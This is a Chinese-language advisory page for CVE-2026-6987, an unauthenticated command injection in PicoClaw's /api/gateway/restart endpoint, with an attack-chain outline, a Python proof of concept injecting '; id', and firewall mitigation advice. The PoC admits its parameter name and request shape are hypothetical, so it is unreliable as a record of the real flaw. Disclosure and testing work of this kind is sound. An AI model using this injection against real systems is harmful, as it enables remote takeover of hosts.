CVE-2026-6987 PicoClaw 命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-6987

漏洞类型

命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PicoClaw

漏洞概述

PicoClaw 0.2.4及更早版本中存在严重的命令注入漏洞。该漏洞位于Web Launcher Management Plane组件的 `/api/gateway/restart` 接口处。由于未对用户输入进行严格过滤，未经身份验证的远程攻击者可利用此漏洞执行任意系统命令。攻击成功后，可能导致系统被完全控制，造成敏感信息泄露、数据篡改及服务中断。官方尚未对此漏洞做出响应。

技术细节

漏洞根源在于PicoClaw Web Launcher Management Plane组件对 `/api/gateway/restart` 端点处理逻辑中的缺陷。当该接口接收用户数据时，直接将其拼接到系统命令中执行，未经过任何安全过滤或转义处理。攻击者利用CVSS向量中的网络攻击向量（AV:N），无需任何权限（PR:N）和用户交互（UI:N），即可构造特定的恶意HTTP请求发送至受影响主机。通过注入如 `;`、`|` 或 `&&` 等Shell元字符，攻击者能够截断原有命令并追加执行任意操作系统指令。鉴于CVSS评分7.3，该漏洞对机密性、完整性和可用性均构成低至中度影响。由于漏洞存在于重启网关的功能中，攻击者甚至可能导致服务持续不可用，进一步扩大攻击面。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过网络扫描识别出互联网上暴露的PicoClaw服务，并确定其版本在0.2.4及以下。

STEP 2

步骤2：漏洞探测

攻击者向 `/api/gateway/restart` 接口发送特制的探测请求，尝试注入简单的回显命令以验证漏洞是否存在。

STEP 3

步骤3：命令执行

验证成功后，攻击者构造包含恶意Shell命令的Payload发送给目标服务器。由于无认证要求，服务器直接解析并执行该命令。

STEP 4

步骤4：建立控制

利用执行的命令，攻击者反弹Shell或窃取敏感数据，从而获取对受影响系统的控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_cve_2026_6987(target_url):
    """
    PoC for CVE-2026-6987 (Command Injection in PicoClaw)
    Note: The parameter name is hypothetical based on the description.
    """
    # The vulnerable endpoint
    endpoint = "/api/gateway/restart"
    full_url = f"{target_url}{endpoint}"
    
    # Payload to inject a command (e.g., `id`)
    # Assuming a parameter like 'service_name' or 'cmd' is accepted
    payload = "valid_input; id" 
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "CVE-2026-6987-Scanner"
    }
    
    # JSON data structure (hypothetical)
    data = {
        "service_name": payload
    }

    try:
        print(f"[+] Sending payload to {full_url}...")
        response = requests.post(full_url, json=data, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response:")
            print(response.text)
            # Check if command execution output is present (e.g., "uid=")
            if "uid=" in response.text or "gid=" in response.text:
                print("[!] Potential command injection detected!")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://127.0.0.1:8080"
    exploit_cve_2026_6987(target)

影响范围

PicoClaw <= 0.2.4

防御指南

临时缓解措施

由于官方尚未发布补丁，建议立即限制对 `/api/gateway/restart` 接口的网络访问，通过防火墙规则仅允许必要的内部管理IP访问。同时，应密切监控系统日志，检测是否存在针对该接口的异常调用或可疑的系统命令执行记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6987
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6987
3 Details https://www.cvedetails.com/cve/CVE-2026-6987/
4 VulDB https://vuldb.com/cve/CVE-2026-6987
5 Link https://github.com/sipeed/picoclaw/issues/2307
6 Link https://vuldb.com/submit/796336
7 Link https://vuldb.com/vuln/359530
8 Link https://vuldb.com/vuln/359530/cti